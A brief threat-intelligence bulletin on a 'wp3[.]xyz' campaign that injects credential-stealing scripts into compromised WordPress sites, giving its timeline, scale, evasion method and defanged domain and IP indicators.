Intel Name: Ongoing “wp3[.]xyz” campaign activity
Date of Scan: January 24, 2025
Impact: High
Summary: This campaign uses scripts linked to the domain wp3[.]xyz, injected into compromised WordPress sites to steal sensitive data, such as admin login credentials. Our telemetry shows activity beginning as early as October 2024, with over 10,000 websites compromised and infections peaking in December 2024. We identified more than a dozen polymorphic JavaScript samples, altering minor elements like log statements to evade detection by changing their hash. The domain wp3[.]xyz, re-registered on October 3, 2024, is hosted on 192.142.10[.]6 (Ultrahost, Inc., NL), an IP associated with other malicious .xyz domains.